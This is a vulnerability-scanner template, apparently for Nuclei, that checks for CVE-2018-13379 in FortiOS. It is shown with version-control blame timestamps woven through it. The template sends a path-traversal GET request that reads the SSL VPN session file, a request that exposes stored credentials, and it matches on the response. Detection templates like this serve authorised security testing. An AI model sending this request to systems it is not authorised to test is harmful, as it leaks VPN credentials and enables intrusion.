2020-09-15 19:25:55 +00:00
|
|
|
id: cve-2018-13379
|
2020-04-22 06:42:01 +00:00
|
|
|
|
|
|
|
info:
|
2020-06-22 13:35:37 +00:00
|
|
|
name: FortiOS - Credentials Disclosure
|
2020-04-22 06:42:01 +00:00
|
|
|
author: organiccrap
|
|
|
|
severity: high
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
2020-05-25 07:49:06 +00:00
|
|
|
path:
|
2020-04-22 06:42:01 +00:00
|
|
|
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2020-05-25 07:49:06 +00:00
|
|
|
words:
|
2020-04-22 06:42:01 +00:00
|
|
|
- "var fgt_lang ="
|